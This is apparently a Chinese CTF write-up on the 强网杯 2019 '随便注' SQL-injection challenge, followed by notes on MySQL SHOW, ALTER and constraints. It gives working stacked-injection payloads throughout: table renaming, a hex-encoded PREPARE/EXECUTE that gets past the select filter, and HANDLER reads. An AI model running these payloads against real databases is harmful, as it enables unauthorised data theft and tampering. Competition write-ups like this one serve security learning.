[强网杯 2019]随便注
输入1‘
输入1“
和输入1 一样说明是由‘闭合
然后我们尝试输入select
![[强网杯 2019]随便注_第1张图片](http://img.e-com-net.com/image/info8/a93493d5ae284f3e80e2e1fba6fbe737.jpg)
这里提示过滤了select,说明联合查询,报错注入,布尔,时间盲注就都不可以使用了。我们只剩下了 堆叠注入。 或者将select编码绕开也可以。
按sql注入测试1' or 1=1 #
![[强网杯 2019]随便注_第2张图片](http://img.e-com-net.com/image/info8/12d071c88b73423fb096ebee32627cc8.jpg)
然后测试字段
1' order by 1 #直到3报错
![[强网杯 2019]随便注_第3张图片](http://img.e-com-net.com/image/info8/f0a601206c094db1893eeaac4fea2232.jpg)
因为知道了select被过滤了,使用堆叠注入
先通过show databases爆出数据库。
0'; show databases; #![[强网杯 2019]随便注_第4张图片](http://img.e-com-net.com/image/info8/8989953ed7574386ab8ff9e22453d6fb.jpg)
然后用 show tables 尝试爆表。
0'; show tables; #![[强网杯 2019]随便注_第5张图片](http://img.e-com-net.com/image/info8/dc020ac4f3514b3b8acf5b3da3679e74.png)
可以看到这里有两个表,我们先尝试爆words表的内容。
1'; show columns from words; # ![[强网杯 2019]随便注_第6张图片](http://img.e-com-net.com/image/info8/7f169cdd7b86498586621d9d3a33a409.png)
然后报表 1919810931114514 的内容。
这里学到一个新知识点,表名为数字时,要用反引号包起来查询。
1'; show columns from `1919810931114514`; #![[强网杯 2019]随便注_第7张图片](http://img.e-com-net.com/image/info8/c2cd697cceeb4bdb975f071b0c5b7873.jpg)
可以发现爆出来了flag字段,然而我对于flag毫无办法,这里看别的大佬的wp
解题思路1:
借鉴 : 强网杯2019随便注
1,通过 rename 先把 words 表改名为其他的表名。
2,把 1919810931114514 表的名字改为 words 。
3 ,给新 words 表添加新的列名 id 。
4,将 flag 改名为 data 。
1'; rename table words to word1; rename table `1919810931114514` to words;alter table words add id int unsigned not Null auto_increment primary key; alter table words change flag data varchar(100);#
解题思路2:
借鉴buuoj强网杯2019随便注
因为select被过滤了,所以先将select * from ` 1919810931114514 `进行16进制编码
再通过构造payload得
;SeT@a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql;#
进而得到flag
prepare…from…是预处理语句,会进行编码转换。
execute用来执行由SQLPrepare创建的SQL语句。
SELECT可以在一条语句里对多个变量同时赋值,而SET只能一次对一个变量赋值。
解题思路3:
寒假之后打了打i春秋的比赛,里面的一道web题black_list简直就是这道题的进化版,当时实在做不出来。。。还是太菜了
比赛后复现用的payload:
1'; handler `FlagHere` open as `a`; handler `a` read next;#
1';HANDLER FlagHere OPEN; HANDLER FlagHere READ FIRST; HANDLER FlagHere CLOSE;#
这个方法同样适用于这道题,payload:
1'; handler `1919810931114514` open as `a`; handler `a` read next;#
1’;Set @sql=concat(“s”,“elect * from 1919810931114514”);PREPARE sqla from @sql;EXECUTE sqla; #
![[强网杯 2019]随便注_第8张图片](http://img.e-com-net.com/image/info8/ce856f82e7d64ce89813b8ca0bc26285.jpg)
?inject=1’;prepare pysnow from concat(‘se’,‘lect flag from 1919810931114514’);execute pysnow;%23
知识点总结:
先总结这道题学会的新知识 alter ,show 和 SQL约束 。
show
在过滤了 select 和 where 的情况下,还可以使用 show 来爆出数据库名,表名,和列名。
show datebases; //数据库。
show tables; //表名。
show columns from table; //字段。alter
作用:修改已知表的列。( 添加:add | 修改:alter,change | 撤销:drop )
用法:
- 添加一个列
alter table " table_name" add " column_name" type;- 删除一个列
alter table " table_name" drop " column_name" type;- 改变列的数据类型
alter table " table_name" alter column " column_name" type;- 改列名
alter table " table_name" change " column1" " column2" type;
alter table "table_name" rename "column1" to "column2";SQL约束 (规定表中数据的规则)
- not null- 指示某列不能存储 NULL 值。
-
alter table persons modify age int not null;//设置 not null 约束 。 -
alter table person modify age int null;//取消 null 约束。
- primary key - NOT NULL 和 UNIQUE 的结合。指定主键,确保某列(或多个列的结合)有唯一标识,每个表有且只有一个主键。
alter table persons add age primary key (id)
- unique -保证某列的每行必须有唯一的值。(注:可以有多个 UNIQUE 约束,只能有一个 PRIMARY KEY 约束。 )
alter table person add unique (id);//增加unique约束。
- check-限制列中值的范围。
alter table person add check (id>0);- default-规定没有给列赋值时的默认值。
alter table person alter city set default 'chengdu' ;//mysqlalter table person add constraint ab_c default 'chengdu' for city;//SQL Server / MS Access
-
auto_increment-自动赋值,默认从1开始。
-
foreign key-保证一个表中的数据匹配另一个表中的值的参照完整性。